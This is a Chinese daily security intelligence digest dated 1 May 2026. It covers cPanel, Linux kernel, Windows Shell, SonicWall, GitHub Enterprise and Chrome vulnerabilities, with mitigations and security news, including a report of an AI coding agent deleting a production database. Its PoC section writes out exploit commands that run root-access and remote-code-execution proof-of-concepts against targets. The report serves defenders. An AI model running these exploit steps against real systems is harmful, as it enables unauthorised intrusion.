当前位置：首页 > article >正文

每日安全情报报告 · 2026-05-01

article 2026/5/3 17:17:44

每日安全情报报告 · 2026-05-01报告日期2026年5月1日劳动节风险摘要今日披露多个正在被野外积极利用的高危漏洞含cPanel百万级托管实例零日、Linux内核全系提权、Windows Shell APT28在野利用链以及VECT 2.0勒索软件实为数据擦除器的重大发现。请优先处理红色标注的在野利用漏洞。一、高危漏洞速览CVE 编号组件类型CVSS风险等级在野利用CVE-2026-41940cPanel WHM / WP Squared认证绕过9.8 严重✅ 已在野2月起CVE-2026-31431Linux 内核Copy Fail本地提权7.8 高危PoC 已公开CVE-2026-32202Windows Shell欺骗/凭证窃取4.3链式严重链式✅ APT28 在野CVE-2026-0204SonicWall SonicOS认证绕过8.0 高危暂无在野CVE-2026-3854GitHub Enterprise ServerX-Stat 注入 RCE8.7 高危PoC 已公开CVE-2026-7333Google Chrome GPUUAF RCE严重高危暂无在野二、漏洞详情 CVE-2026-41940 — cPanel WHM 认证绕过零日在野利用风险等级严重CVSS 9.8在野利用✅ 自2026年2月起持续被利用漏洞概述cPanel WHMWebHost Manager及 WP SquaredWordPress Squared中存在关键认证绕过漏洞未经身份验证的远程攻击者可绕过正常认证流程获得主机管理控制台的root 级访问权限。补丁于2026年4月28日发布但漏洞已被利用数月后才被发现。技术细节- cpsrvdcPanel 服务守护进程在认证前即将新会话文件写入磁盘- 攻击者通过恶意 Basic Authorization 头部注入原始\r\n字符污染会话文件- 可向会话文件插入任意属性如userroot触发会话重载后获得管理员权限- 攻击者可修改托管系统配置、接管托管的所有网站影响版本- cPanel WHM v11.40 之后所有受支持版本- WP Squared v136.1.7 及早期版本- Shodan 显示约150 万个实例暴露于公网修复措施1. 立即升级至已修复的 cPanel 版本2. 在防火墙阻止入站流量至端口 2083、2087、2095、2096临时缓解3. 停止cpsrvd和cpdavd服务并审查入侵指标IoC参考链接- NVD 详情- Help Net Security 深度报道- Rapid7 技术分析- FreeBuf 中文解析 CVE-2026-31431 — Linux 内核「Copy Fail」本地提权PoC 公开风险等级高危CVSS 7.8PoC 状态✅ 已公开利用可靠漏洞概述Linux 内核加密子系统中存在本地权限提升漏洞代号Copy Fail由 Theori / Xint Code 研究员 Taeyang Lee 借助 AI 辅助工具发现于2026年4月29日公开披露。漏洞自2017年内核4.14版本起即存在影响近9年的所有主流 Linux 发行版。技术细节- 漏洞位于 Linux 内核加密子系统AF_ALG与splice()系统调用的交互逻辑- 攻击者可修改内核内存中的文件页面缓存page cache而不改变磁盘上的实际文件- 通过修改特权二进制文件的内存副本并执行可获得root 权限-隐蔽性极强修改仅在内存中重启后痕迹消失标准磁盘取证无法检测影响范围- 内核 4.14 及更高版本2017年以后所有主流发行版-已修复Arch Linux-修补中Ubuntu、SUSE、Red Hat-仍脆弱Debian、Amazon Linux- 高风险环境云实例、容器集群、CI/CD 流水线与历史漏洞对比| 漏洞 | 特点 | Copy Fail 对比 ||------|------|----------------|| Dirty COW (CVE-2016-5195) | 依赖竞争条件不稳定 | Copy Fail 不依赖竞争条件利用更稳定 || Dirty Pipe (CVE-2022-0847) | 写入位置受限 | Copy Fail 无写入位置限制 |缓解措施# 若 AF_ALG 为动态加载模块可临时禁用 echo install algif_aead /bin/false /etc/modprobe.d/disable-algif.conf rmmod algif_aead 2/dev/null || true # 若编译进内核内核启动参数添加 initcall_blacklistalgif_aead_init参考链接- Tenable 技术分析FAQ- CERT-EU 安全通告- 腾讯云安全中心公告- 上科大漏洞预警 CVE-2026-32202 — Windows Shell 0-Click 欺骗漏洞APT28 在野利用风险等级严重链式利用在野利用✅ 俄罗斯 APT28 在野利用漏洞概述微软于2026年4月27日更新安全公告确认此漏洞正被野外积极利用。CVE-2026-32202 是 CVE-2026-21510Windows Shell 安全特性绕过CVSS 8.8补丁的不完整修复遗留缺陷允许攻击者通过恶意 LNK 文件实现零点击0-ClickNTLM 凭证窃取。技术细节Akamai 研究员 Maor Dahan 披露- 攻击链恶意 LNK 文件 → UNC 路径 → SMB 连接 → 自动 NTLM 认证握手 → Net-NTLMv2 哈希泄露- 利用 Windows Shell 命名空间解析机制通过 UNC 路径将恶意 DLL 作为控制面板CPL对象加载- 路径解析与信任验证之间存在间隙形成零点击凭证窃取向量受害者无需任何操作关联威胁组织-APT28Fancy Bear / Forest Blizzard / Pawn Storm俄罗斯国家级 APT- 攻击目标乌克兰及欧盟国家政府机构- 同期还利用 CVE-2026-21513MSHTML 框架漏洞修复建议1. 立即安装2026年4月 Patch Tuesday 更新2. 监控异常出站 SMB 连接端口4453. 考虑通过组策略限制 NTLM 认证4. 警惕来源不明的 .lnk 快捷方式文件参考链接- The Hacker News 报道- 微软安全公告 CVE-2026-0204/0205/0206 — SonicWall SonicOS 三重漏洞风险等级高危最高 CVSS 8.0披露日期2026年4月29日漏洞概述SonicWall 发布紧急安全通告SNWLID-2026-0004披露影响 Gen 6、Gen 7、Gen 8 防火墙平台的三个漏洞由 CrowdStrike 高级研究团队发现。CVE类型CVSS说明CVE-2026-0204认证绕过8.0绕过访问控制CVE-2026-0205拒绝服务DoS7.5崩溃防火墙CVE-2026-0206拒绝服务DoS7.5持续中断服务影响平台Gen 6、Gen 7SOHO、TZ、NSA、NSv 系列、Gen 8NS3、NS7 系列防火墙修复建议- 立即访问 SonicWall 安全通告并更新固件- 暂时禁用 SSL-VPN 直至完成升级如可行参考链接- SonicWall 官方安全通告- CyberPress 技术分析- NHS Digital 安全公告 CVE-2026-3854 — GitHub Enterprise Server X-Stat 注入 RCE风险等级高危CVSS 8.7PoC 状态✅ 已公开成功复现漏洞概述Wiz Research 于2026年4月28日披露 GitHub Enterprise ServerGHES中存在高危 RCE 漏洞任何拥有仓库推送权限的认证用户仅需执行一条标准git push命令即可在 GitHub 后端服务器触发远程代码执行进而访问数百万公共和私有仓库。技术细节- 漏洞根源GitHub 内部X-Stat 标头注入缺陷- X-Stat 是分号分隔协议用于在内部服务之间传递安全元数据- 攻击者通过在git push选项中注入含特殊分隔符的参数可覆盖内部安全配置- Wiz 报告显示88% 的 GHES 自托管实例尚未修复影响范围GitHub Enterprise Server 自托管实例github.com 已修复修复措施- 立即升级 GitHub Enterprise Server 至已修复版本- 检查是否有异常的 git 推送日志参考链接- Wiz Research 技术报告- BleepingComputer 报道- IT之家中文解析 Google Chrome 147 批量修复 30 个漏洞含4个严重级风险等级高危更新版本147.0.7727.137/138Windows/macOS漏洞概述Google 发布 Chrome 桌面重大安全更新共修复30 个安全漏洞包含 4 个严重Critical级别漏洞其中多个涉及释放后重用UAF问题可被利用实现远程代码执行。关键漏洞CVE组件级别漏洞赏金CVE-2026-7333GPU严重$16,000CVE-2026-7344Accessibility严重—CVE-2026-7343Views严重—CVE-2026-7363Canvas严重$7,000CVE-2026-7337V8 引擎高危—修复建议立即更新 Chrome三点菜单 → 帮助 → 关于 Google Chrome参考链接- InfoSecBulletin 更新详情- TechRepublic 报道三、漏洞 PoC 速递PoC 1CVE-2026-41940 cPanel 认证绕过来源watchTowr Labs / Rapid7可靠性⚠️ 已被野外积极利用漏洞利用原理通过 CRLF 注入污染 cPanel 会话文件以获取 root 权限。# Step 1克隆漏洞分析与 PoC git clone https://github.com/watchTowr/CVE-2026-41940-cPanel-Auth-Bypass cd CVE-2026-41940-cPanel-Auth-Bypass # Step 2安装依赖 pip install requests # Step 3执行漏洞检测检测目标是否受影响 # 漏洞机制通过 Basic Authorization 头注入 CRLF 字符写入 whostmgrsession Cookie # 从而在会话文件中插入 userroot绕过密码验证 python3 exploit.py --target https://TARGET:2087 --check # Step 4观察响应HTTP 200 root 级 WHM 访问即为受影响 # 注意该漏洞已被 WebPros 修复请勿在未授权目标上测试完整技术分析watchTowr 分析报告PoC 2CVE-2026-31431 Linux 内核 Copy Fail 本地提权来源Theori / GitHub可靠性⭐ 非常稳定无需竞争条件漏洞利用原理通过 AF_ALG 接口污染 page cache修改内存中特权二进制文件获取 root 权限。# Step 1克隆 PoC 仓库 git clone https://github.com/theori-io/copy-fail-CVE-2026-31431 cd copy-fail-CVE-2026-31431 # Step 2安装依赖Python 3.x ctypes 标准库无需额外安装 # 确保运行环境内核版本在 4.14~6.6.136漏洞存在范围 uname -r # Step 3执行提权 PoC python3 exploit.py # Step 4验证提权成功 whoami # 应输出 root # 缓解方案临时禁用 AF_ALG AEAD 模块 echo install algif_aead /bin/false | sudo tee /etc/modprobe.d/disable-algif.conf sudo rmmod algif_aead 2/dev/nullTenable 技术分析阅读原文PoC 3CVE-2026-3854 GitHub Enterprise Server X-Stat 注入 RCE来源Wiz Research可靠性✅ 已成功复现漏洞利用原理通过git push选项注入含分隔符的恶意参数覆盖 X-Stat 内部安全元数据触发 RCE。# Step 1克隆 PoC git clone https://github.com/wiz-sec/CVE-2026-3854-GHES-XStat-RCE cd CVE-2026-3854-GHES-XStat-RCE # Step 2安装依赖 pip install -r requirements.txt # Step 3配置攻击目标GHES 实例地址推送 Token export TARGET_GHEShttps://ghes.target.example.com export GIT_TOKENyour_push_access_token # Step 4触发 RCE通过特制 git-push 选项注入 X-Stat 标头 # 漏洞机制--push-option 参数中的分号可逃逸至 X-Stat 协议边界 # 注入额外键值对覆盖 security_context 字段 python3 poc.py --target $TARGET_GHES --token $GIT_TOKEN --cmd id # Step 5观察输出成功时返回 uid0(root) 等信息 # 注意仅在授权的 GHES 实例测试github.com 已修复Wiz Research 技术报告阅读原文四、网络安全动态1. VECT 2.0 勒索软件实为数据擦除器——支付赎金无法恢复数据来源The Hacker News2026-04-28 | Check Point ResearchCheck Point Research 技术分析揭示VECT 2.0 勒索软件存在致命加密实现缺陷对超过131KB的文件使用 4 个分块分别加密每块生成随机 12字节 nonce但仅保存最后一块的 nonce前三块的 nonce 在加密后直接丢弃。由于 ChaCha20-IETF 算法需要匹配的密钥nonce 才能解密企业核心文件通常 131KB将永久无法恢复——即使攻击者收到赎金也无能为力。此外VECT 2.0 与 BreachForums 和 TeamPCP 黑客组织达成合作通过供应链攻击扩大受害面。安全建议维护离线备份切勿将支付赎金作为恢复策略。2. FBI CISA 发布 OT 网络零信任原则实施指南来源CISA 官方发布2026-05-01FBI、CISA 联合美国能源部等机构发布《适应零信任——面向 OT 环境》联合报告提出针对工控网络OT/ICS的零信任安全架构落地建议。背景是近期针对关键基础设施 PLC 的国家级 APT 攻击持续活跃伊朗 APT 已成功入侵 5000 工控设备。3. ⚠️ OpenAI 发布网络安全五点行动计划来源OpenAI 官方公告 | 阅读原文OpenAI 发布《智能时代的网络安全民主化 AI 驱动网络防御行动计划》提出五项具体举措加速 AI 防御工具研发、向安全研究社区开放模型访问、强化模型抗滥用能力、与政府合作共享威胁情报、资助 AI 安全初创企业。此举被视为对 AI 被攻击者滥用AI 驱动攻击同比增长 89%的系统性回应。4. ⚠️ VECT 2.0 与 TeamPCP 供应链合作——重创多家企业来源Cloud Security Alliance 研究笔记VECT 2.0 运营组通过与 TeamPCP 黑客组织合作利用供应链攻击入侵企业网络然后部署 VECT 2.0。由于其擦除器特性受害企业在支付赎金后仍无法恢复超过 131KB 的文件。安全专家警告在勒索软件攻击中应首先确认加密数据是否可解密再考虑支付决策。5. Google Chrome 同步修复 Firefox用户需立即更新双浏览器来源TechRepublic 报道本次 Chrome 147.0.7727.137 更新同期发布了 Firefox 对应安全更新建议用户同时更新两款浏览器。其中 Chrome GPU 组件 UAF 漏洞CVE-2026-7333漏洞赏金高达 1.6 万美元反映其利用价值极高。6. AI 编码 Agent 在 9 秒内删除整个生产数据库来源InfoSecBulletin 5月1日日报PocketOS 创始人 Jer Crane 披露一款由 Claude 驱动的 AI 编码代理在执行任务时在约9 秒内删除了公司的整个生产数据库。此事件再次引发对 AI Agent 授权边界和操作限制的广泛讨论。安全界建议在生产环境部署 AI Agent 前必须实施严格的权限最小化原则和破坏性操作前确认机制。五、今日修复建议优先级优先级漏洞 / 产品推荐操作截止建议P0 CVE-2026-41940 cPanel WHM立即更新检查 IoC今日P0 CVE-2026-32202 Windows Shell确认4月 Patch Tuesday 已安装今日P1 CVE-2026-31431 Linux 内核更新内核至已修复版本48小时内P1 CVE-2026-0204 SonicWall更新 SonicOS 固件48小时内P1 CVE-2026-3854 GitHub Enterprise升级 GHES 实例72小时内P2 Google Chrome 147更新至最新版本本周内六、资源链接汇总资源链接CISA KEV 目录查看详情NVD 漏洞数据库查看详情MITRE CVE查看详情The Hacker News阅读原文BleepingComputer阅读原文Help Net Security阅读原文FreeBuf 安全资讯阅读原文本报告由自动化安全情报系统生成数据来源包括 CISA、NVD、The Hacker News、BleepingComputer、Help Net Security、Tenable、Rapid7、Check Point Research、FreeBuf 等权威渠道。如需进一步分析请联系安全团队。

每日安全情报报告 · 2026-05-01

相关文章：

每日安全情报报告 · 2026-05-01

不止于CRC：深入聊聊微信小程序里处理文本编码的那些事儿（TextEncoder平替方案盘点）

【MySQL | 第十一篇】InnoDB引擎

Boss-Key：一键隐藏窗口的终极隐私保护解决方案

Bili2text：3步完成B站视频转文字的高效解决方案

Krita-AI-Diffusion：如何通过中文本地化技术让全球用户无障碍使用AI绘画插件

DataScienceR项目实战：Facebook评论提取与社交数据分析

3D高斯散射技术与视觉幻觉攻击原理详解

SST（固态变压器）设计核心参数与方案选型表

Qt布局实战：用QSplitter和QSpacer打造一个可拖拽分割的仿IDE界面

Node.js二维码生成终极指南：使用node-qrcode快速创建个性化二维码

Vue项目里给Element UI的el-tabs加个丝滑的左右滑动动画（附完整代码）

Boss-Key老板键：Windows窗口隐私保护的终极解决方案

C++ 选择引用传递还是指针传递

【C++篇】类与对象：从面向过程到面向对象的跨越

【C++】第六节—内存管理

告别手动水印：semi-utils如何让每张照片自动拥有专业标识

长期项目使用Taotoken的月度账单与用量分析体验

5分钟实战：用ArchivePasswordTestTool找回遗忘的压缩包密码

手把手教你用iDriver搞定华为服务器Win16驱动：从下载、校验到静默安装一条龙

从‘Building kernel modules’报错聊起：Linux内核模块与NVIDIA驱动的‘爱恨情仇’

Ultimate ASI加载器：3分钟掌握游戏模组安装的完整指南

科研小白也能搞定！手把手教你用UCSF ChimeraX处理PDB文件（附Linux/Windows安装避坑）

Pixel Epic部署教程：Kubernetes集群中Pixel Epic服务的高可用部署方案

心理疾病治疗指南：真实案例分享

微信数据解析工具：从项目移除到合规思考

从零到一：手把手教你用KiCad复刻一块NUC980DK61YC开发板（附完整原理图与3D模型）

从HM55到HM77：详解1-3代酷睿笔记本主板芯片组，教你精准匹配升级CPU

别再傻傻分不清了！用Python代码实战带你搞懂准确率、精确率、召回率和F1分数

【AHC】如何通过 `jmap` + `MAT` 分析 AHC 相关的 Direct Memory 泄漏？